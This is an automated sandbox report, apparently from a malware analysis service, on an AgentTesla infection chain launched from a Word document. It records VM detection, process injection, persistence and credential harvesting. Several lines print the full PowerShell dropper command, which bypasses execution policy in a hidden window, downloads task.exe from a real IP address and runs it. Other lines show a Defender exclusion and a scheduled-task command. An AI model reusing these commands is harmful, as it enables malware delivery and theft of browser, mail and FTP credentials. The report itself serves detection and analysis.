Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe	Window / User API: threadDelayed 6172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Window / User API: threadDelayed 620	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Window / User API: threadDelayed 9581	Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: task.exe, 00000009.00000002.447908400.00000000008EA000.00000004.00000001.sdmp	Binary or memory string: VMware_S
Source: task.exe, 00000009.00000003.446953826.0000000005531000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe

Memory written: C:\Users\user\AppData\Roaming\task.exe base: 400000 value starts with: 4D5A

Jump to behavior

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe			Jump to behavior

Injects files into Windows application

Show sources

Source: C:\Windows\System32\notepad.exe

Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Jump to behavior

Bypasses PowerShell execution policy

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Queries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Queries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 14.0.task.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.33d4df8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.339ebd8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.task.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.339ebd8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.33d4df8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Source: Yara match	File source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 14.0.task.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.33d4df8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.339ebd8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.task.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.339ebd8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.task.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.task.exe.33d4df8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Scheduled Task/Job1	Process Injection211	Disable or Modify Tools11	OS Credential Dumping2	File and Directory Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting3	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information1	Input Capture11	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Logon Script (Windows)	Scripting3	Security Account Manager	Security Software Discovery311	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution33	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter13	Network Logon Script	Network Logon Script	Software Packing13	LSA Secrets	Virtualization/Sandbox Evasion131	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol32	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Scheduled Task/Job1	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	PowerShell3	Startup Items	Startup Items	Virtualization/Sandbox Evasion131	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection211	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.0.task.exe.400000.13.unpack	100%	Avira	TR/Spy.Gen8	Download File
14.0.task.exe.400000.5.unpack	100%	Avira	TR/Spy.Gen8	Download File
14.0.task.exe.400000.11.unpack	100%	Avira	TR/Spy.Gen8	Download File
14.0.task.exe.400000.7.unpack	100%	Avira	TR/Spy.Gen8	Download File
14.2.task.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1143187	Download File
14.0.task.exe.400000.9.unpack	100%	Avira	TR/Spy.Gen8	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
httP://173.232.2	0%	Avira URL Cloud	safe
httP://173.232.204.89/t	0%	Avira URL Cloud	safe
http://java.lp	0%	Avira URL Cloud	safe
http://173.232.204.89	0%	Avira URL Cloud	safe
httP://173.232.204.89/task.exePE	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
httP://173.232	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://173.232.204.89/task.exe	0%	Avira URL Cloud	safe
httP://173.232.204.89/task.ex	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.198.143	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://173.232.204.89/task.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
httP://173.232.2	powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp	false		high
httP://173.232.204.89/t	powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://java.lp	powershell.exe, 00000003.00000002.429782897.00000000001F9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
